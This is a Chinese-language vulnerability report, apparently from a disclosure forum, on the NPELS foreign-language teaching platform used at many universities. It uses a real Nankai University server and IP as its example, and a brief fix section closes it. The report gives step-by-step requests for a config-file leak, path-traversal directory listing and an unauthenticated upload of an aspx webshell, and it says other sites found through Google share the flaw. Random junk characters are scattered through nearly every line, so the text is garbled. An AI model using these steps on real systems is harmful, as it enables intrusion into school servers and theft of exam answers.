好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中5 a$ c2 @6 m# X5 M: H$ w4 r" J
! {4 ?/ Z; n, L8 H" m N1 U
详细说明:
: E3 f3 b* Q% p$ n3 D4 W2 y / D1 y* J: y' e0 a0 R; E: o
以南开大学的为例: 3 h( W5 ^' ]' q5 f- V8 B4 }2 k; U
http://222.30.60.3/NPELS
4 q1 [) r: Z5 a2 R- o9 d/ qNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
9 D+ c# y" ]4 C: p- [3 a6 o9 E! M3 R6 b7 ]<setting name="Update_CommonSvr_CommonService" serializeAs="String">4 U: R1 F" P& O U
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>! _% K$ w; h! l1 n/ Z* u
</setting>- J0 |' [3 U# N+ [/ r O
及版本号
3 w5 ^, U" {" T. c h' Q m% u0 q<add key="TVersion" value="1, 0, 0, 2187">
6 O- S- L8 y$ w6 N6 j. }</add>! R6 R. ]# b! x% Y- i0 S$ _( t
直接访问5 a! ]7 G) t% B& t2 F* ?
http://222.30.60.3/NPELS/CommonService.asmx
# U) m7 o. r# [' j3 F e使用GetTestClientFileList操作,直接 HTTP GET 列目录:8 ?0 F* ?. f# v
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
5 D7 r! \) p$ p: S进一步列目录(返回的网页很大,可以直接 wget 下来)
+ z k$ K* X- P4 M6 }http://222.30.60.3/NPELS/CommonS ... List?version=../../$ T9 S8 b0 E7 ~9 X: Z1 H
2 @& _$ W$ t: g! O发现2 u% ?5 v% _1 _
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm3 C" ^0 [, S6 t5 m
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头0 t' x2 [0 o0 R2 x4 J, d
上传后继续列目录找到木马地址直接访问即可, {) S/ W. I; |8 {: C
" B- N7 B' J) ]7 l. iOOXX7 S. s' c5 V" l9 L1 Z
! r. D/ M9 j; U( }2 A S( e2 \) CGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法; _2 X- w& y) c2 N3 D5 h
漏洞证明:* [4 S8 o3 u$ e. W' E
+ T) P4 ?1 u4 l Q0 E/ @
列目录:
; \! Q% c% L3 F- ~http://222.30.60.3/NPELS/CommonS ... List?version=../../
" a' R9 @) e5 w' y9 N% b% R& x文件上传:: Z! B8 _/ v8 p2 D0 ~' D
http://222.30.60.3/npelsv/editor/editor.htm! O* v/ z; w3 e( e2 z' w, M& @
2 z, }; n9 i [, W5 b) _: ?- a上传木马:! H W/ T, `/ H
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx( U+ Q1 n% {( ]& d) V! C+ O+ s6 n
# v4 ^+ t8 W0 }+ f' R修复方案:
# V0 E3 r* ]& s1 u4 I' X l好像考试系统必须使用 CommonService.asmx5 z0 J& q9 W- U8 C6 }6 w7 R4 ?
最好配置文件加密或者用别的方式不让它泄露出来
+ H; v$ _- V; ]2 @; @并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样: ~* K5 x7 F, x5 S6 @: N7 }; @
|